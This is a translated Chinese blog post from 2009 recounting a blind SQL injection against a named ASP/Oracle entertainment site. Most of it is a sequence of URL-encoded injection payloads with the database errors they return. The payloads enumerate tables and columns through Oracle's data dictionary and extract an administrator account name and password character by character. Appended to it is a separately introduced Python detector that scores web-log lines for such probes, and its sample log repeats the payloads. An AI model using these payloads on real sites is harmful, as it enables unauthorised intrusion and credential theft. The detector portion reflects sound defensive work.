85167118's blog

西安艺语网络传媒印务有限公司

Posts

A hands-on injection against ASP + Oracle

2009-12-31 08:20:22 | Category: hacking knowledge

http://et.kpworld.com/star.asp?performer=马三立;
----------------------------------------
OraOLEDB error 80040e14 ORA-00911: invalid character
/star.asp, line 83

This shows the semicolon is filtered.

http://et.kpworld.com/star.asp?performer=马三立
----------------------------------------
OraOLEDB error 80004005 ORA-01756: quoted string not properly terminated
/star.asp, line 83

So there is an unfiltered single-quote problem.

http://et.kpworld.com/star.asp?performer=马三立 and 1=1
----------------------------------------
Closing its single quote: the page returns normally.

and 0<(select count(*) from admin) and 1=1
----------------------------------------
OraOLEDB error 80040e37 ORA-00942: table or view does not exist
/star.asp, line 83

This shows there is no table named ADMIN.

******************************************************************

Next we need to know Oracle's system views (表名 below stands for the table name):

Total row count of a table:
select num_rows from user_tables where table_name=表名
user_tables ----------------------- holds all tables of the current user
where table_name=表名
select column_name,
from user_tab_columns ----------------------- holds all columns
where table_name=表名

and 0<(select count(*) from all_tables) and 1=1
----------------------------------------
It exists! all_tables is a system view that holds all tables of the current account and of other users.

and 0<(select count(*) from user_tables) and 1=1
----------------------------------------
Returned. This system view exists; it holds all tables of the current user.

and 0<(select top 1 table_name from user_tables) and 1=1
----------------------------------------
OraOLEDB error 80040e14 ORA-00923: FROM keyword not found where expected
/star.asp, line 83

TOP 1 not supported? ...... that explanation doesn't seem quite right...
(PINKEYES tested it and confirmed that TOP 1 really is not supported.)

and 0<(select count(*) from user_tables where table_nam) and 1=1
----------------------------------------
OraOLEDB error 80040e14 ORA-00904: invalid column name
/star.asp, line 83

When the syntax is wrong, it reports an invalid column name.

and 0<(select count(*) from user_tables where table_name) and 1=1
----------------------------------------
When the syntax is correct, the success marker is returned; it seems four single quotes stand for an empty string. Next, tests of some functions:

and 0<(select count(*) from user_tables where sum(table_name)>1) and 1=1
----------------------------------------
OraOLEDB error 80040e14 ORA-00934: group function is not allowed here
/star.asp, line 83

Group functions are not allowed here.

and 0<(select count(*) from user_tables where avg(table_name)) and 1=1
----------------------------------------
OraOLEDB error 80040e14 ORA-00934: group function is not allowed here
/star.asp, line 83

Group functions are not allowed here.

and 0<(select to_char(table_name) from user_tables) and%201=1
----------------------------------------
OraOLEDB error 80004005 ORA-01427: single-row subquery returns more than one row
/star.asp, line 83

The single-row subquery returns more than one row.

and 0<(select count(*) from user_tables where table_name+1) and%201=1
----------------------------------------
OraOLEDB error 80040e14 ORA-00920: invalid relational operator
/star.asp, line 83

That's it for the tests; now let's see how to get its tables out:

and 0<(select count(*) from performer) and%201=1
----------------------------------------
Returned successfully. This table name was guessed from the URL parameter above.

and 0<(select count(*) from user_tables where table_name=performer) and%201=1
----------------------------------------
Nothing returned: the failure marker.

and%200<(select%20count(*)%20from%20user_tables%20where%20table_name=PERFORMER) and%201=1
----------------------------------------
Success! It seems user_tables only recognises upper-case letters! (Oracle stores unquoted identifiers in upper case in its data dictionary.)

and 0<(select count(*) from user_tables where length(table_name)>10) and%201=1
----------------------------------------
Use the length function to find how long the longest table name is.

and 0<(select count(*) from user_tables where length(table_name)=18) and%201=1
----------------------------------------
Several steps omitted; in the end the longest table name is 18 characters.

and 0<(select count(*) from user_tables where substr(table_name,1,1)=A) and%201=1
----------------------------------------
The first character is A,

and 0<(select count(*) from user_tables where substr(table_name,1,2)=AD) and%201=1
----------------------------------------
the first two are AD

and 0<(select count(*) from user_tables where substr(table_name,1,18)=ADMINAUTHORIZATION) and%201=1
----------------------------------------
Several steps omitted; the 18-character table name is ADMINAUTHORIZATION.

and 1=(select count(*) from user_tables where table_name=ADMINAUTHORIZATION) and%201=1
----------------------------------------
Returned.

and 0<(select count(*) from user_tables where length(table_name)=2) and%201=1
----------------------------------------
The shortest table name is 2 characters.

and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25user%25)%20and%20%201=1
----------------------------------------
Nothing returned.

and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25ADMIN%25)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25PER%25) and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25BBS%25)%20and%201=1
----------------------------------------
All returned successfully. So LIKE can be used for guessing.

and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)>8) and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)>10)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)=10)%20and%201=1
----------------------------------------
Combining LIKE with LENGTH pins the length down right away.

and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)=BBSS)%20and%201=1
----------------------------------------
The fourth character is S. From here on it is repetitive work.

and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)=BBSSUBJECT)%20and%201=1
----------------------------------------
Got it: BBSSUBJECT

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=BBSSUBJECT%20and%20column_name%20like%20%25USER%25)%20and%201=1
----------------------------------------
Nothing returned; this doesn't look like the table that stores users and passwords. Try again...

and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)>10)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)>15)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)=15)%20and%201=1
----------------------------------------
Length confirmed as 15.

and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)=U%20and%20length(table_name)=15)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)=S%20and%20length(table_name)=15)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)=USER%20and%20length(table_name)=15)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)=UNSUBSCRIBEUSER)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name=UNSUBSCRIBEUSER)%20and%201=1
----------------------------------------
Table name confirmed: UNSUBSCRIBEUSER. Next, guess whether it has a password column...

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=UNSUBSCRIBEUSER%20and%20column_name%20like%20%25USER%25)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=UNSUBSCRIBEUSER%20and%20column_name%20like%20%25PASS%25)%20and%201=1
----------------------------------------
LIKE PASS: nothing returned. Annoying. Carry on.

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20%25PASS%25%20and%20length(table_name)=13)%20and%201=1
----------------------------------------
Returned. Not precise.

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)=SS) and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)=SS)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)=PASS) and%201=1
----------------------------------------
Here SUBSTR narrows the range.

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)=PASS%20and%20length(column_name)=11)%20and%201=1
----------------------------------------
The column containing PASS is 11 characters long: the 4 characters from position 4 are PASS, so there are 3 characters before PASS and 4 after, 11 in total.

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)=PASSWORD)%20and%201=1
----------------------------------------
Take a guess... and sure enough...

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)=STRPASSWORD)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20length(table_name)=13)
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20length(table_name)=13)%20and%201=1
----------------------------------------
All returned; the password column is confirmed as STRPASSWORD. With the password column in hand the rest is easier; now use it to get the table name:

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20length(table_name)=13) and 1=1
----------------------------------------
Returned, consistent with the table-name length guessed above. Use SUBSTR to get its name:

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20substr(table_name,1,13)=ADMINISTRATOR) and 1=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20table_name=ADMINISTRATOR) and 1=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tables%20where%20table_name=ADMINISTRATOR) and 1=1
----------------------------------------
All returned; table name confirmed: ADMINISTRATOR.

and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR) and 1=1
----------------------------------------
The table has 8 columns.

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name%20like%20%25ID%25)%20and%201=1
----------------------------------------
and%203=(select%20count(*)%20from%20ADMINISTRATOR) and 1=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,4,2)=ID)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,-2,2)=ID)%20and%201=1
----------------------------------------
So it ends in ID and is 5 characters long.

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,-5,5)=LNGID)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name=LNGID)%20and%201=1
----------------------------------------
There it is: LNGID.

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%201=1
----------------------------------------
and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%201=1
----------------------------------------
and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%201=1
----------------------------------------
Minimum and maximum ID obtained; now for the password:

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%201=1
----------------------------------------
The password for LNGID 8 is 4 characters long.

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%201=1
----------------------------------------
First character.

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%201=1
----------------------------------------
Second character.

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%201=1
----------------------------------------
Third character.

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%201=1
----------------------------------------
Fourth character.

STRPASSWORD: test

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=test%20and%20LNGID=8)%20and%201=1
----------------------------------------
OH YEAH~~ the password is out.

Now the user name:

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name%20like%20%25NAME%25)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,4,4)=NAME)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,-4,4)=NAME)%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,1,7)=STRNAME)%20and%201=1
----------------------------------------
There it is, column: STRNAME

and%200<(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name%20not%20in(STRNAME,STRPASSWORD,LNGID))%20and%201=1
----------------------------------------
and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=test%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%201=1
----------------------------------------
The STRNAME value is 4 characters long; surely it isn't the same as the password...

and%200<(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=test%20and%20LNGID=8%20and%20STRNAME=test)%20and%201=1
----------------------------------------
Heh, it is.

Table ADMINISTRATOR; columns: STRNAME, STRPASSWORD, LNGID
LNGID=8 STRNAME=test STRPASSWORD=test

Test complete! The rest is only a matter of time.
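Every step above is one boolean question asked through the same URL parameter, and each one leaves a line in the web server log. As an added example (not code from the original post), here is a log-side check a defender could run: it URL-decodes constructed IIS-style log lines, scores each query for the Oracle data-dictionary references, subquery comparisons and character-inference functions used above, and counts flagged requests per client. The log field order, the client addresses, the weights and the thresholds are all assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in a simplified IIS W3C layout (field order assumed):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2009-12-31 08:10:01 198.51.100.7 GET /star.asp performer=%E9%A9%AC%E4%B8%89%E7%AB%8B 200
2009-12-31 08:10:05 198.51.100.7 GET /star.asp performer=%E9%A9%AC%E4%B8%89%E7%AB%8B%27 500
2009-12-31 08:10:09 198.51.100.7 GET /star.asp performer=x%27%20and%20%271%27=%271 200
2009-12-31 08:10:14 198.51.100.7 GET /star.asp performer=x%27%20and%200%3C(select%20count(*)%20from%20user_tables%20where%20length(table_name)=18)%20and%20%271%27=%271 200
2009-12-31 08:10:20 198.51.100.7 GET /star.asp performer=x%27%20and%200%3C(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20%27%25PASS%25%27)%20and%20%271%27=%271 200
2009-12-31 08:10:27 198.51.100.7 GET /star.asp performer=x%27%20and%200%3C(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116)%20and%20%271%27=%271 200
2009-12-31 08:11:40 203.0.113.9 GET /news.asp id=42 200
"""

# (name, pattern, weight); matched against the fully decoded, lower-cased query.
INDICATORS = [
    ("oracle-data-dictionary", re.compile(r"\b(user_tables|user_tab_columns|all_tables)\b"), 4),
    ("subquery-comparison", re.compile(r"\b(and|or)\s+\d+\s*[<>=]\s*\(\s*select\b"), 3),
    ("char-inference-func", re.compile(r"\b(substr|ascii|length)\s*\("), 2),
    ("tautology-tail", re.compile(r"\b(and|or)\s+'?(\w+)'?\s*=\s*'?\2'?\s*$"), 1),
]
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

def score_query(raw_query):
    """Score one cs-uri-query value; returns (score, list of indicator names)."""
    q = unquote(unquote(raw_query)).lower()  # two rounds: probes are often double-encoded
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(q):
            score += weight
            hits.append(name)
    if q.count("'") % 2:  # lone quote, the ORA-01756 probe (low weight: O'Brien is legal input)
        score += 1
        hits.append("unbalanced-quote")
    return score, hits

def severity(score):
    return "high" if score >= 5 else "suspicious" if score >= 1 else "clean"

def analyze_log(text):
    """Return a finding for every request whose query scores above zero."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _date, when, ip, _method, stem, query, status = m.groups()
        score, hits = score_query(query)
        if score and status == "500":  # malformed probe rejected by the database layer
            score += 2
            hits.append("server-error")
        if score:
            findings.append({"time": when, "ip": ip, "stem": stem, "score": score,
                             "severity": severity(score), "indicators": hits})
    return findings

def probing_clients(findings, threshold=3):
    """Clients with >= threshold flagged requests: each probe leaks one bit, so volume is a signal."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

On the sample, the bare-quote probe that produced a 500 and the `and '1'='1` test score as suspicious, the three data-dictionary and character-inference probes score high, and the single client that sent all five is reported by `probing_clients`.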

 

 

Copyright © 1997-2017 NetEase